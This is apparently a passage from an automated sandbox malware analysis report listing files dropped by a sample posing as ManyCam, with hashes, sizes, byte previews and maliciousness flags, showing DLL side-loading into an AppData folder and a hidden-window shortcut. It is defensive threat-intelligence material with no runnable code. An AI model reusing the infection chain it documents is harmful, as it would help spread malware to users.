SHA-512:	6A0386424C61FBF525625EBE53BB2193ACCD51C2BE9A2527FD567D0A6E112B0D1A047D8F7266D706B726E9C41EA77496E1EDE186A5E59F5311EEEA829A302325
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: iieCxV2b1n.msi, Detection: malicious, Browse Filename: kvW4hZu9JA.msi, Detection: malicious, Browse Filename: PauizRq7By.msi, Detection: malicious, Browse Filename: XtDhwVrVKn.exe, Detection: malicious, Browse Filename: VqBVE8dJEA.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........3...R..R..R..f]..R..2...R....R....R....R....R..R..Q.....R....R....R..Rich.R..........................PE..L...e..M............................\|B............@.................................f.........P......................................@..................H............................................d..@............................................text...b........................... ..`.rdata..B...........................@..@.data........P.......P..............@....rsrc........@......................@..@................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\RarSFX0\cv099.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	679936
Entropy (8bit):	6.674616014554414
Encrypted:	false
SSDEEP:	12288:dHxL34kbwAQR5+ERTJGZfnpyvhZFjtJbPbwQjtX5ooVyPMDFdqvGHjucsEUNwm/7:dzbwAQR57RJGoxjP7/2+HINwwb
MD5:	2A8B33FEE2F84490D52A3A7C75254971
SHA1:	16CE2B1632A17949B92CE32A6211296FEE431DCA
SHA-256:	FAFF6A0745E1720413A028F77583FFF013C3F4682756DC717A0549F1BE3FEFC2
SHA-512:	8DAF104582547D6B3A6D8698836E279D88AD9A870E9FDD66C319ECADA3757A3997F411976461ED30A5D24436BAA7504355B49D4ACEC2F7CDFE10E1E392E0F7FB
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Y.IO.q'..q'..q'...Y..q'.:.J..q'.:.Z..q'.:.\..q'..q&..q'.:.I.#q'.:.]..q'.:.[..q'.:._..q'.Rich.q'.........PE..L.....YM...........!.........p..........................................................................................a+......P.......,.......................T9..P...................................@...............,............................text............................... ..`.rdata..............................@..@.data...........0..................@....rsrc...,...........................@..@.reloc...:.......@... ..............@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\RarSFX0\cxcore099.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	929792
Entropy (8bit):	6.883111719944197
Encrypted:	false
SSDEEP:	24576:dNoLaQGpXDCfZCgs1ruSteHz3+AzEOyIrbnYyw:7msgUeTGIrbM
MD5:	286284D4AE1C67D0D5666B1417DCD575
SHA1:	8B8A32577051823B003C78C86054874491E9ECFA
SHA-256:	37D9A8057D58B043AD037E9905797C215CD0832D48A29731C1687B23447CE298
SHA-512:	2EFC47A8E104BAA13E19BEE3B3B3364DA09CEA80601BC87492DE348F1C8D61008002540BA8F0DF99B2D20E333D09EA8E097A87C97E91910D7D592D11A953917A
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................&......&......&............&......&......&......&.....Rich...........PE..L...w.YM...........!......... .......................................................d..................................b(......d....@..4....................P...e......................................@...............H............................text............................... ..`.rdata..b/.......0..................@..@.data........@...p...@..............@....rsrc...4....@......................@..@.reloc...g...P...p..................@..B........................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\RarSFX0\cximagecrt.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	498760
Entropy (8bit):	6.674124910838454
Encrypted:	false
SSDEEP:	12288:fJaqPgrHZx0Cxn0P5ASCH8aH6IAC+tITsQ8p:fkqPgr5x0Cxn0P5ASCH8aaIACDTx8p
MD5:	C36F6E088C6457A43ADB7EDCD17803F3
SHA1:	B25B9FB4C10B8421C8762C7E7B3747113D5702DE
SHA-256:	8E1243454A29998CC7DC89CAECFADC0D29E00E5776A8B5777633238B8CD66F72
SHA-512:	87CAD4C3059BD7DE02338922CF14E515AF5CAD663D473B19DD66A4C8BEFC8BCE61C9C2B5A14671BC71951FDFF345E4CA7A799250D622E2C9236EC03D74D4FE4E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B2/..SA[.SA[.SA[..?[.SA[!.<[.SA[!.:[.SA[.S@[.SA[!.,[ISA[!./["SA[!.;[.SA[!.9[.SA[Rich.SA[................PE..L......M...........!.........`......]........ ......................................a!..................................#U..t...x....@..................H....P... ..p"..............................@...@............ ..X............................text............................... ..`.rdata....... ....... ..............@..@.data...<....0.......0..............@....rsrc........@.......@..............@..@.reloc..n!...P...0...P..............@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\RarSFX0\dbghelp.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	489984
Entropy (8bit):	6.620025610968628
Encrypted:	false
SSDEEP:	6144:R3KP8f7yYkluOutwm5ZNetC5IlhhMdyFWgQK7x5Iz4JxRRAuUzT/9cl84S683Wbh:R3X5ZNG2yIycw5IGxRwVc6683WbQ4
MD5:	C481103724F456CB422834F633B221D9
SHA1:	4EDD4719E7F48F10A880D06F4FD8C2C2F09EA360
SHA-256:	652E514BE96A6AE38D61628B825B95A3F18189F97551B328D12BD4E0CB67F46F
SHA-512:	4F3F7167EDC693C73E7B50C8E15945C98681777C349926B5D4224A43CF59D5BE098E32191ECCF1DD41F56C4601DC8090DBAF26194C39FA991E366906458B57CA
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......$..`..`..`.....I.....b..`........k......g.....p.....a......a.....w.....a..Rich`..........PE..L.....m=...........!................5l............Qm................................................................0.......$...x....P.......................`...K..@................................................................................text............................... ..`.data...,@.......*..................@....rsrc........P......................@..@.reloc...e...`...f..................@..B..m=8...(.m=C...(.m=P.......Z...(.m=f...).m=s...........msvcrt.dll.KERNEL32.dll.NTDLL.DLL.VERSION.dll.ADVAPI32.dll.RPCRT4.dll...................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\RarSFX0\highgui099.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	397312
Entropy (8bit):	6.672405371278951
Encrypted:	false
SSDEEP:	12288:J+7gXTkVRt1dixRtVq2EjMS2E7ETstO/:JlTeRt1dSzd4MSUTsO/
MD5:	A354C42FCB37A50ECAD8DDE250F6119E
SHA1:	0EB4AD5E90D28A4A8553D82CEC53072279AF1961
SHA-256:	89DB6973F4EC5859792BCD8A50CD10DB6B847613F2CEA5ADEF740EEC141673B2
SHA-512:	981C82F6334961C54C80009B14A0C2CD48067BAF6D502560D508BE86F5185374A422609C7FDC9A2CDE9B98A7061EFAB7FD9B1F4F421436A9112833122BC35059
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r\|..6...6...6......4......;......5....;..n......#...6..........."......7......7......7...Rich6...........PE..L.....YM...........!.........@......y........................................ .......r.............................. K..F....9..........d........................#..`...................................................D............................text............................... ..`.rdata..f...........................@..@.data...0r...`...p...`..............@....rsrc...d...........................@..@.reloc...$.......0..................@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\RarSFX0\ith

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	4092894
Entropy (8bit):	7.950017111810137
Encrypted:	false
SSDEEP:	98304:IuDlh/XIsGMfQ9c0B5KDsldsWAR+HwE0jnr7IEz3daB8:IAhvIgY+OMb+HwEMTx
MD5:	535E6BAA0579A8B19BED5857D49BDD0D
SHA1:	AF5B463561AFD9052575F266868DB19292D0EA6D
SHA-256:	8DAFB1E5373A0CC2CE18D7DBC4A51A127D104B9E7E3B95670F0DB2A9D7952D8F
SHA-512:	5546362378302B254EC2E0FDB31013866AF997C0C7A2420ED98AF1517B707CF36DFCB55830CD1FDB70CAE2EBF5EA999D4E9743BAF821D3BB55511AC8483D5DB8
Malicious:	false
Preview:	.Y.L.J.gL.IQROaeg^UFL.ZTMJ.....FO.K..s.T...hU..a.Aj..........Pn....ui.B...T..lPfV.W.h.s..B..pK...G.iEyM...S..c........`.[.....PNe.C_.t....X..Qh\.ji.ENm.G`j.......jHYTJOY...y..l.\tDV......u.d.[..AXu.....g.`..^t.l.E...O.fDh.K....G.v.I.CN......ja`.DX.......U......XEi..l..]l.q\dxZT`rU.s...gC.s.Qy..uK.j.m.I.[C...DUX.ym..syA....i..gs.v.c.\.....U]._v.HL.wu..By.....pkY..KY.p..r.qBF.....q....H..C..Z.ZyJ...fupy.iy.R.Z.V.h.i......YT.WcL....._..Rw..i...q....p.Ifs.b...JDDTS.iieTnq.U...R..UBXmsL..T..g.......F.l]...j....nk.M.`.w.a...Ys.EJN..NX.lD.r...f.J.N..BZyNMJBhO.AS.Z...x.RbQ.L.j.wh....YV..en..Ydt...h.xX.o..SyI...bw]aAF.O.s...k..LCa...._.LLp..bxq..fef]CB.Y.tfc.ns...Ps.f..aK....YE..N.....\F.K.....rE...J.Jc..nU...yM.J`_L.^..n.^l..Yn....T..[.VJ...b.s.t.........AN.....O.c\.........B...].p.\.....V.E.QBeU...a...V_vOL.[.....nbisu.rR...^STMq]..q.kea..Pe.dg....utPPtF..e.r.a_.a_o.S..k[.h.\lw]Y....re.BGYrZ.ERHc.wU.u\K..GW...y..R..i.eV..F._.^\.Cbmyl..K`q.nK...pJ..^B..T....J.S........V.j.oqkj^^a.JVD..[.Wi.s[T

C:\Users\user\AppData\Local\Temp\RarSFX0\jlfx

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	88923
Entropy (8bit):	4.3411591827480684
Encrypted:	false
SSDEEP:	1536:9UqVAygmDacN2Uc8p3PcjPugJ78LqHd6VJHBL+JkV0hL1mTHARcVYUmQNwkOX7xn:GyLDaGpfcD3WLhvHx+KoLETHbmQN4X7N
MD5:	CB4C2B33CC5CC6025B4F3B373CFCBE97
SHA1:	7D73D590AE51CE06021EC2E0DC939D267A79F788
SHA-256:	DAB9A7C4310FAC43CC21B924FE8899071E6884CD142F992C1FBAF5140C998268
SHA-512:	680990A0CFB7E8F8AC4AFD69AD292A03C46995529D62EAC76965297F8CB03D78AD8BB799B149E8E74DC90CC185A0DB53AEDD0DB80C36A8410D14F24C7F2FE9FB
Malicious:	false
Preview:	.s..ETgX....E.....OS.x...M..^qJX.[..qx.OJb.iW.nZ.`T.PU..OT`...pq..s.g.x...^C...s.p...nG.o.bN.x..c...KDO..r..QFYl.iVM..V....O..xI_y...w...B.hH.B.g..U._..P.....L...f...m.y..A.\H.]d...O..y.Y.m..ue^.Xi..L..L..qhKNcN.[VhJjp....m^..^t.hxL......`.EF...gk.ctj.H.s.._UDC....k.led.Kg..fMx..N.nEuo....Fy...U.]...FM..k..[..M.JI\.....m.u...s..j.e..R_.Oc..L..hsB.D..[iT_x.K..WZ..jgc.al.].UPt...........w....wqP.....].....W_tQv..CB..Im.Fd.A.f...X.jS....Qg.VJf.._.AO...i.Y.BIPs.Nm.y..N.bs.xI.d.R.l.rr.u...l...mns....vd.p..vl..Kp.gS\fB.EE.CF.a\o...y....u...j.......[X.f.._.\.w..V...Znl.M...b.ss.M.qF.ghTM.......\.JW..v.v.X.os....qVh.....p..wd.`.S.\nHM.TIEy.H.QVdA.v..ntVuI.he.CptnK..N..mW..I.Y.H.m...V..JM....g.....G......].s_...cO.H..[.c.....B.M...o..Ji...n.^.A...X....S.N.Rx_..oK.Tc._........e.f..OS..M..y.E.WDg.hcNVE.biK.c..Ff.n....a...Ih...f^N.rRAj..IY....LQ\.K.Z._.u.Y.j..`OJ.....G..F]...D.Rh...QW..^.H.....h^NcRI..Y..FMBFt....C.K..L.k.X.jlq...Ds..._\H......Cif.y.R.....u....yLd...p...jho.]G.Hc.AVS...eBe...E..rS

C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	2364728
Entropy (8bit):	6.606009669324617
Encrypted:	false
SSDEEP:	49152:lbCT2kOGRpfJMi3kLRQrjYgeeZyTDwMHfDYZNBi:TkOKMiY0BZMHfDYZNBi
MD5:	967F4470627F823F4D7981E511C9824F
SHA1:	416501B096DF80DDC49F4144C3832CF2CADB9CB2
SHA-256:	B22BF1210B5FD173A210EBFA9092390AA0513C41E1914CBE161EB547F049EF91
SHA-512:	8883EAD428C9D4B415046DE9F8398AA1F65AE81FE7945A840C822620E18F6F9930CCE2E10ACFF3B5DA8B9C817ADE3DABC1DE576CBD255087267F77341900A41C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........:<..To..To..To.:.o..To...o..To.:9o..To.:.o..To.:/o..To..Uoe.To...o\|.To...o..To...o..To...o..ToRich..To................PE..d...^.?e..........#......H.....................@..............................%.....h.$.....................................................XW..,........q...p..$h....#.8)......................................(....................`...............................text...RG.......H.................. ..`.rdata..R/...`...0...L..............@..@.data................\|..............@....pdata..$h...p...j..................@..@Shared...............p..............@....tls.................x..............@....rsrc....q.......r...z..............@..@................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\b37dab96

Download File

Process:	C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe
File Type:	data
Category:	dropped
Size (bytes):	5215852
Entropy (8bit):	7.672966815140129
Encrypted:	false
SSDEEP:	98304:ZLP/dFz6hLN4OZWqZB8HSsBpjV722UB9IuxI+P9I6wDDOwEM:Zb/dgTCHSSpjk9B9BFPiXOwH
MD5:	76649B61196C651A79488D512E2319AB
SHA1:	2533848ED6E5B4451707C03680EC8BE744D44F7F
SHA-256:	F09C0E37F19ED3E4594B9D8EDBCD0F8AECDD6A4A584B1B8E54B0D357F5A1576C
SHA-512:	2C1AC05ADFD5561E0E6714066D8174105E24C3D711EE764C4D6C4DEAC7C4424320AD477EEEB468C625BC1780F4D7928AE6FCF66BCEFC8343F11F8B87BB1DF944
Malicious:	false
Preview:	..m...m...m...m...m.=.m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...l.<.=H].9Y<. qz..kv..DN..\|v..DJ..jm. }w.1Hk..jx..DJ..jm.....m...m...m...m...m...m...m...m...m...m...m.Z.$vp..yu..}\.m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m.Z..j\|..}P..lx..}..m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m.<.$V].?=E..{k..w..CV\.1^k..}n..s..m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m.o.C(7.]/+.m...m...m...m...m...m...m...m...m...m...m.

C:\Users\user\AppData\Local\Temp\b9f3530d

Download File

Process:	C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe
File Type:	data
Category:	dropped
Size (bytes):	5215852
Entropy (8bit):	7.67296694039451
Encrypted:	false
SSDEEP:	98304:hLP/dFz6hLN4OZWqZB8HSsBpjV722UB9IuxI+P9I6wDDOwEM:hb/dgTCHSSpjk9B9BFPiXOwH
MD5:	8C43B0A958F63B5472370E5F2519F1EE
SHA1:	F7847656DCC81897DC69F3EE4CCD40042916F065
SHA-256:	A094A575029571AA388D7A967F72CED99602E29047CD2D5265E3E2A1DEF674F9
SHA-512:	00B24E6D7AF825D423D6C5A74CF52CF4C679684FD0D9A63224AEE5063BF648D589B9F359530F094E3A03E4330F59A3D3E7EB566E56694929675AD7E2CB701739
Malicious:	false
Preview:	..m...m...m...m...m.=.m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...l.<.=H].9Y<. qz..kv..DN..\|v..DJ..jm. }w.1Hk..jx..DJ..jm.....m...m...m...m...m...m...m...m...m...m...m.Z.$vp..yu..}\.m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m.Z..j\|..}P..lx..}..m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m.<.$V].?=E..{k..w..CV\.1^k..}n..s..m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m.o.C(7.]/+.m...m...m...m...m...m...m...m...m...m...m.

C:\Users\user\AppData\Local\Temp\dawfefqddjbx

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	2118656
Entropy (8bit):	6.691133871535744
Encrypted:	false
SSDEEP:	49152:5wMIQK4YxQd/QBptz8YdQYoMLyN+ktx2yBfTOONMzGGUDsXipc0hU3L51DF:aAonqIO+kwztXPh
MD5:	E7D2F8DC61F637D0624823C6539BCDBB
SHA1:	40B1CD63BA62CBE90CFED885089134D2EEC68783
SHA-256:	9C9B8824D692E3F459B8A35D870490418848C5E470E8F9DFEFDF374E74F7219F
SHA-512:	E034512EAB1F4330E4C11AC855BFE122AAB0ED66CAC2779AF25E06E5F5C0C1D9C99AF3E12D8703728F571709678B495254BC9DC385A731C6304A2E155BE67CA1
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....=O.................4...@ ..`..W..........@............................. '......'!...`... ...............................................&.(.....&.8.......D^............'.h...........................@...(...................x.&..............................text....2.......4..................`..`.data........P.......8..............@....rdata....... ......................@..@.pdata..D^.......`..................@..@.xdata...G.... ..H..................@..@.bss.... _...` ..........................idata..(.....&......4 .............@....CRT....0.....&......: .............@....tls..........&......< .............@....rsrc...8.....&......> .............@..@.reloc..h.....'......@ .............@..Bqdx...........'......D .............@...................................................................................................................................

C:\Users\user\AppData\Local\Temp\thiphljqfhe

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sat Oct 19 16:53:02 2024, mtime=Sat Oct 19 16:53:02 2024, atime=Sat Oct 19 07:31:08 2024, length=1756232, window=hide
Category:	dropped
Size (bytes):	914
Entropy (8bit):	5.004519753305515
Encrypted:	false
SSDEEP:	12:8O1Ke4qmWCc1dY//k0JLs/o68/6Te3AX5z/nODRjAyrHuEwJHFC5ODBmV:8WEqx51+JF+q3AX5a5Ay2ZFDBm
MD5:	3E8AC88DE913382EB0106C67FCC6B110
SHA1:	B4594B1D1989F4D3B690635DF4D699C78DBA99AE
SHA-256:	68CC4148B2FD217BC68EEEEA2D380F95E6F6C79ADD2248E8F97A12D5ABCC5764
SHA-512:	FB2A3C59687A1F0497654B04FC291D04E8EED4663070973BDF1A4890DC9B04727822AEAD790B83AD903EFD1296DC053C0BB46CBC5F173E920FA70B9F92AAE2D1
Malicious:	false
Preview:	L..................F.... ......O"....-.O".....>."..H.........................:..DG..Yr?.D..U..k0.&...&......vk.v....q.j.O"......O"......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^SY.............................%..A.p.p.D.a.t.a...B.V.1.....SY....Roaming.@......CW.^SY................................R.o.a.m.i.n.g.....h.1.....SY....EH_MON~1..P......SY..SY......a.........................E.H._.M.o.n.i.t.o.r._.t.e.s.t.....b.2.H...SY.C .ManyCam.exe.H......SY..SY......v.........................M.a.n.y.C.a.m...e.x.e.......i...............-.......h.............du.....C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe..).....\.....\.R.o.a.m.i.n.g.\.E.H._.M.o.n.i.t.o.r._.t.e.s.t.\.M.a.n.y.C.a.m...e.x.e.`.......X.......942247...........hT..CrF.f4... ..T..b...,.......hT..CrF.f4... ..T..b...,......E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

C:\Users\user\AppData\Local\Temp\ydoicpxmibx

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	2118656
Entropy (8bit):	6.691133871535744
Encrypted:	false
SSDEEP:	49152:5wMIQK4YxQd/QBptz8YdQYoMLyN+ktx2yBfTOONMzGGUDsXipc0hU3L51DF:aAonqIO+kwztXPh
MD5:	E7D2F8DC61F637D0624823C6539BCDBB
SHA1:	40B1CD63BA62CBE90CFED885089134D2EEC68783
SHA-256:	9C9B8824D692E3F459B8A35D870490418848C5E470E8F9DFEFDF374E74F7219F
SHA-512:	E034512EAB1F4330E4C11AC855BFE122AAB0ED66CAC2779AF25E06E5F5C0C1D9C99AF3E12D8703728F571709678B495254BC9DC385A731C6304A2E155BE67CA1
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....=O.................4...@ ..`..W..........@............................. '......'!...`... ...............................................&.(.....&.8.......D^............'.h...........................@...(...................x.&..............................text....2.......4..................`..`.data........P.......8..............@....rdata....... ......................@..@.pdata..D^.......`..................@..@.xdata...G.... ..H..................@..@.bss.... _...` ..........................idata..(.....&......4 .............@....CRT....0.....&......: .............@....tls..........&......< .............@....rsrc...8.....&......> .............@..@.reloc..h.....'......@ .............@..Bqdx...........'......D .............@...................................................................................................................................

C:\Users\user\AppData\Roaming\EH_Monitor_test\CrashRpt.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	123976
Entropy (8bit):	6.382577198291231
Encrypted:	false
SSDEEP:	3072:fzjKVg7GOfS5SqPcCXA4SQlah+8Z4OAAHWTtopW+Z:fzjKVg7GOESqPcCXxT8hhZ4OAAHW2Wa
MD5:	B2D1F5E4A1F0E8D85F0A8AEB7B8148C7
SHA1:	871078213FCC0CE143F518BD69CAA3156B385415
SHA-256:	C28E0AEC124902E948C554436C0EBBEBBA9FC91C906CE2CD887FADA0C64E3386
SHA-512:	1F6D97E02CD684CF4F4554B0E819196BD2811E19B964A680332268BCBB6DEE0E17B2B35B6E66F0FE5622DFFB0A734F39F8E49637A38E4FE7F10D3B5182B30260
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................W.....U.....U.............U.......U.......U.....U.....U....Rich....................PE..L.....M...........!................'........ ......................................Gb..............................P........t..........d%..............H...........`$..............................0W..@............ ...............................text...8........................... ..`.rdata../l... ...n..................@..@.data...t...........................@....rsrc...d%.......&..................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1756232
Entropy (8bit):	6.047140524753333
Encrypted:	false
SSDEEP:	49152:wlkcF8MnJ6tdGeHzpNTxlSvQynZAWBM2FU+SrzcBsWLZF5:wlf8MnJ6tdGeHzpNTxlSvfnOWC6U5Ed5
MD5:	BA699791249C311883BAA8CE3432703B
SHA1:	F8734601F9397CB5EBB8872AF03F5B0639C2EAC6
SHA-256:	7C4EB51A737A81C163F95B50EC54518B82FCF91389D0560E855F3E26CEC07282
SHA-512:	6A0386424C61FBF525625EBE53BB2193ACCD51C2BE9A2527FD567D0A6E112B0D1A047D8F7266D706B726E9C41EA77496E1EDE186A5E59F5311EEEA829A302325
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........3...R..R..R..f]..R..2...R....R....R....R....R..R..Q.....R....R....R..Rich.R..........................PE..L...e..M............................\|B............@.................................f.........P......................................@..................H............................................d..@............................................text...b........................... ..`.rdata..B...........................@..@.data........P.......P..............@....rsrc........@......................@..@................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\EH_Monitor_test\cv099.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	679936
Entropy (8bit):	6.674616014554414
Encrypted:	false
SSDEEP:	12288:dHxL34kbwAQR5+ERTJGZfnpyvhZFjtJbPbwQjtX5ooVyPMDFdqvGHjucsEUNwm/7:dzbwAQR57RJGoxjP7/2+HINwwb
MD5:	2A8B33FEE2F84490D52A3A7C75254971
SHA1:	16CE2B1632A17949B92CE32A6211296FEE431DCA
SHA-256:	FAFF6A0745E1720413A028F77583FFF013C3F4682756DC717A0549F1BE3FEFC2
SHA-512:	8DAF104582547D6B3A6D8698836E279D88AD9A870E9FDD66C319ECADA3757A3997F411976461ED30A5D24436BAA7504355B49D4ACEC2F7CDFE10E1E392E0F7FB
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Y.IO.q'..q'..q'...Y..q'.:.J..q'.:.Z..q'.:.\..q'..q&..q'.:.I.#q'.:.]..q'.:.[..q'.:._..q'.Rich.q'.........PE..L.....YM...........!.........p..........................................................................................a+......P.......,.......................T9..P...................................@...............,............................text............................... ..`.rdata..............................@..@.data...........0..................@....rsrc...,...........................@..@.reloc...:.......@... ..............@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\EH_Monitor_test\cxcore099.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	929792
Entropy (8bit):	6.883111719944197
Encrypted:	false
SSDEEP:	24576:dNoLaQGpXDCfZCgs1ruSteHz3+AzEOyIrbnYyw:7msgUeTGIrbM
MD5:	286284D4AE1C67D0D5666B1417DCD575
SHA1:	8B8A32577051823B003C78C86054874491E9ECFA
SHA-256:	37D9A8057D58B043AD037E9905797C215CD0832D48A29731C1687B23447CE298
SHA-512:	2EFC47A8E104BAA13E19BEE3B3B3364DA09CEA80601BC87492DE348F1C8D61008002540BA8F0DF99B2D20E333D09EA8E097A87C97E91910D7D592D11A953917A
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................&......&......&............&......&......&......&.....Rich...........PE..L...w.YM...........!......... .......................................................d..................................b(......d....@..4....................P...e......................................@...............H............................text............................... ..`.rdata..b/.......0..................@..@.data........@...p...@..............@....rsrc...4....@......................@..@.reloc...g...P...p..................@..B........................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\EH_Monitor_test\cximagecrt.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	498760
Entropy (8bit):	6.674124910838454
Encrypted:	false
SSDEEP:	12288:fJaqPgrHZx0Cxn0P5ASCH8aH6IAC+tITsQ8p:fkqPgr5x0Cxn0P5ASCH8aaIACDTx8p
MD5:	C36F6E088C6457A43ADB7EDCD17803F3
SHA1:	B25B9FB4C10B8421C8762C7E7B3747113D5702DE
SHA-256:	8E1243454A29998CC7DC89CAECFADC0D29E00E5776A8B5777633238B8CD66F72
SHA-512:	87CAD4C3059BD7DE02338922CF14E515AF5CAD663D473B19DD66A4C8BEFC8BCE61C9C2B5A14671BC71951FDFF345E4CA7A799250D622E2C9236EC03D74D4FE4E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B2/..SA[.SA[.SA[..?[.SA[!.<[.SA[!.:[.SA[.S@[.SA[!.,[ISA[!./["SA[!.;[.SA[!.9[.SA[Rich.SA[................PE..L......M...........!.........`......]........ ......................................a!..................................#U..t...x....@..................H....P... ..p"..............................@...@............ ..X............................text............................... ..`.rdata....... ....... ..............@..@.data...<....0.......0..............@....rsrc........@.......@..............@..@.reloc..n!...P...0...P..............@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\EH_Monitor_test\dbghelp.dll

Download File

